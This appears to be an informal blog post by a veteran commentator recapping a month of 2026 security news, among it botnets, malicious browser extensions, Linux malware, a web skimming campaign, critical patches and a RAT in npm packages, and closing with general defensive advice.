BITS ARE FLIPPING AGAIN: KIMWOLF, RATs & THE ENDLESS PATCH CYCLE.

Dusting Off the Old Shields: A Look Back at the Last Month in the Digital Trenches

Alright, settle in, youngbloods. Grimbly31 here. Seen a lot of bits flip in my time. Used to be you could trace a hack back to a pizza-fueled basement dweller, now… well, it's still sometimes that, but things are getting layered. The last thirty days have been a reminder that the basics haven’t changed – people are still the weakest link, and code is still full of holes – but the way we get poked at is evolving. Fast.

Let’s start with the noise. Two million devices got tangled up with the Kimwolf Android botnet this month. Two million. That's a lot of compromised phones sending spam and probably worse. And speaking of widespread annoyance, the DarkSpectre browser extension campaigns managed to snag data from 8.8 million users. Extensions. Always check what you're installing, kids. Always.

Down in Brazil, things were a bit more targeted. A WhatsApp worm was spreading the Astaroth banking Trojan. Classic social engineering, dressed up with a new delivery method. They’re not inventing new tricks, they're just refining the old ones. Like I said.

But the real shift is happening under the hood. The chatter's been strong about AI being used – not to create new attack vectors, but to make the old ones better. We're seeing automated exploitation of vulnerabilities, more effective supply chain attacks, that sort of thing. It’s less Skynet, more a really, really good script kiddie. And, naturally, everyone's scrambling to secure the AI doing the defending. Saw a webinar advertised on securing agentic AI workflows. Honestly? Feels a bit like locking the stable door after the horse has learned to use a crowbar.

And speaking of under the hood, Linux is taking a beating. This VoidLink malware framework is serious. Specifically targeting cloud environments, containers… the places where everything’s moving. It’s advanced, it’s stealthy, and it's a clear sign that attackers are going after the infrastructure itself, not just the endpoints. There's been a related campaign, UAT-7290, linked to China, hitting up telecoms with Linux nastiness. Feels like the old days of targeted infrastructure attacks, just… slicker.

The web’s still a mess, naturally. A long-running web skimming campaign is still grabbing credit card data. Seems like some things just never change. And we had two separate Chrome extensions stealing ChatGPT and DeepSeek chats from 900,000 users. Ninety. Thousand. People just handing over their conversations. Folks, if you’re sharing anything sensitive on those platforms, assume it’s being watched.

Then there’s the constant patching. n8n had a critical RCE vulnerability (CVSS 10.0, seriously!), and a 9.9 severity one right before it. Microsoft Office and HPE OneView are both flagged as actively exploited by CISA. Cisco ISE is also on the list. It's a never-ending game of whack-a-mole.

And because it’s 2026, there’s a new RAT hiding in npm packages. This one’s called NodeCordRAT, and it's themed around Bitcoin. Honestly, at this point, I'm expecting malware to be delivered via NFT drops.

I was looking at the SANS Surge training schedule – they’re focusing on ransomware and SEC504 tools/playbooks. Smart move. Ransomware hasn’t gone anywhere, and knowing your tools is half the battle.

Look, it’s a lot. But here’s the takeaway: the core principles are still the same. Secure your systems, educate your users, and assume you’re already compromised. Dust off those old shields, update your threat models, and prepare for the next wave. Because believe me, there will be a next wave. I’ve seen enough cycles to know.